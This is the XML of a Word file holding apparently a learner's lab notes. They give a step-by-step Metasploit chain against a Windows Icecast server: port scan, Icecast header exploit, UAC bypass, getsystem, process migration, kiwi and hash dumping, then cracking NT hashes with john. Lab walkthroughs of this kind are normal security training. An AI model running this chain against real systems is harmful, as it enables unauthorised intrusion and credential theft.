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4B25" w14:textId="5EA4D40C" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:r w:rsidRPr="003E3066">
        <w:t>nmap -sV -s</w:t>
      </w:r>
      <w:r w:rsidR="008312FE">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3066">
        <w:t xml:space="preserve"> 192.168.1.212 -vv  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4259DC" w14:textId="5EB44649" w:rsidR="00755B4E" w:rsidRDefault="003E3066">
      <w:r>
        <w:t>Portnumber 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F9397C" w14:textId="213B4FDF" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B73F2AD" w14:textId="693AB4D5" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3066">
        <w:t>search icecast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C38319D" w14:textId="5C3601A2" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:r>
        <w:t xml:space="preserve">&gt;use </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3066">
        <w:t>exploit/windows/http/icecast_header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE98E67" w14:textId="5EDDCA3F" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3066">
        <w:t>set RHOST 192.168.1.212</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4ACCC" w14:textId="2F4B1AB5" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:r>
        <w:t>&gt;exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C703C" w14:textId="322ABE29" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:r>
        <w:t>&gt;getpriv (current privilages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCDE950" w14:textId="2E7D00B6" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A532F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A532F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A532F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> more privilages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AF50A" w14:textId="6B5CD718" w:rsidR="004A532F" w:rsidRDefault="004A532F">
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A532F">
        <w:t>run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B4AA41" w14:textId="0C582B66" w:rsidR="004A532F" w:rsidRDefault="004A532F">
      <w:r>
        <w:t>Back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9A031" w14:textId="7F35378A" w:rsidR="004A532F" w:rsidRDefault="004A532F">
      <w:r>
        <w:t xml:space="preserve">&gt;use </w:t>
      </w:r>
      <w:r w:rsidRPr="004A532F">
        <w:t>exploit/windows/local/bypassuac_eventvwr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130928A8" w14:textId="2831898F" w:rsidR="004A532F" w:rsidRDefault="004A532F">
      <w:r>
        <w:t>&gt;set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F76FF87" w14:textId="67068CB9" w:rsidR="004A532F" w:rsidRDefault="004A532F">
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="008E6C6F">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015181C8" w14:textId="7256ABCE" w:rsidR="008E6C6F" w:rsidRDefault="008E6C6F">
      <w:r>
        <w:t>&gt;getpriv (check the privilages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640A110" w14:textId="615FE81C" w:rsidR="008E6C6F" w:rsidRDefault="008E6C6F">
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>getsystem(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>full access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37585F07" w14:textId="2CA87AC2" w:rsidR="00571463" w:rsidRDefault="00571463">
      <w:r>
        <w:t>&gt;ps (show services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E4E3A7" w14:textId="2E511AE8" w:rsidR="00571463" w:rsidRDefault="00571463">
      <w:r>
        <w:t>&gt;migrate &lt;PID&gt; (migrate to spool service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7882016E" w14:textId="2B8D733E" w:rsidR="00571463" w:rsidRDefault="00571463">
      <w:r>
        <w:t>&gt;load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D44577" w14:textId="77777777" w:rsidR="00571463" w:rsidRDefault="00571463"/>
    <w:p w14:paraId="67965B07" w14:textId="77777777" w:rsidR="00571463" w:rsidRDefault="00571463"/>
    <w:p w14:paraId="1837DB99" w14:textId="7179C563" w:rsidR="008E6C6F" w:rsidRDefault="008E6C6F">
      <w:r>
        <w:t>&gt;hashdumb (hash file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249580D" w14:textId="628E508A" w:rsidR="008E6C6F" w:rsidRPr="00571463" w:rsidRDefault="008E6C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00571463">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recoverhash file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B4B0ED" w14:textId="40E45B92" w:rsidR="008E6C6F" w:rsidRDefault="004A4C89">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4C89">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1399C217" w14:textId="77777777" w:rsidR="004A4C89" w:rsidRPr="008E6C6F" w:rsidRDefault="004A4C89">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E17587" w14:textId="77777777" w:rsidR="008E6C6F" w:rsidRPr="004A532F" w:rsidRDefault="008E6C6F"/>
    <w:p w14:paraId="507981DC" w14:textId="66DD8A9E" w:rsidR="003E3066" w:rsidRDefault="003E3066">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1BB85F" w14:textId="77777777" w:rsidR="004A532F" w:rsidRPr="004A532F" w:rsidRDefault="004A532F"/>
    <w:p w14:paraId="49D5491E" w14:textId="77777777" w:rsidR="003E3066" w:rsidRDefault="003E3066"/>
    <w:p w14:paraId="1B69E913" w14:textId="77777777" w:rsidR="003E3066" w:rsidRDefault="003E3066"/>
    <w:sectPr w:rsidR="003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F2"/>
    <w:rsid w:val="003E3066"/>
    <w:rsid w:val="004A4C89"/>
    <w:rsid w:val="004A532F"/>
    <w:rsid w:val="00571463"/>
    <w:rsid w:val="00755B4E"/>
    <w:rsid w:val="007D0EF2"/>
    <w:rsid w:val="008312FE"/>
    <w:rsid w:val="008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AE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6056F213-6E99-4CE4-83F2-764A72FF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2023-12-01T14:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-01T15:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>